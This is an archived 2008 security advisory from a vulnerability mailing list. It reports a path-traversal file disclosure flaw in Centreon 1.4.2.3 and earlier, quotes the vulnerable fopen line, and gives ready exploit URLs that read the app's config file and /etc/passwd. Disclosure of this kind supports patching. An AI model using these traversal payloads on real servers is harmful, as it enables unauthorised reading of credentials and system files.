Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHPMyTourney Remote file include Vulnerability

  XSS on XRMS- open source CRM

  PR07-41: XSS on Juniper Networks Secure Access 2000

  123 Flash Chat Module for phpBB

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:29.02.2008
Subject:Centreon <= 1.4.2.3 (index.php) Remote File Disclosure

[+] Info:

[~] Software: Centreon <= 1.4.2.3
[~] HomePage: http://www.centreon.com
[~] Exploit: Remote File Disclosure [High]
[~] Where: include/doc/index.php
[~] Bug Found By: Jose Luis Góngora Fernández|JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Spanish Hackers Team [SHT]

[+] Bug In include/doc/index.php:

[~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang().
"/".$_GET["page"], "r");   

[+] Exploit:

[~] /include/doc/index.php?page=../../www/oreon.conf.php
[~] /include/doc/index.php?page=../../../../../etc/passwd
[~] /include/doc/index.php?page=[Local File]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Ðåéòèíã@Mail.ru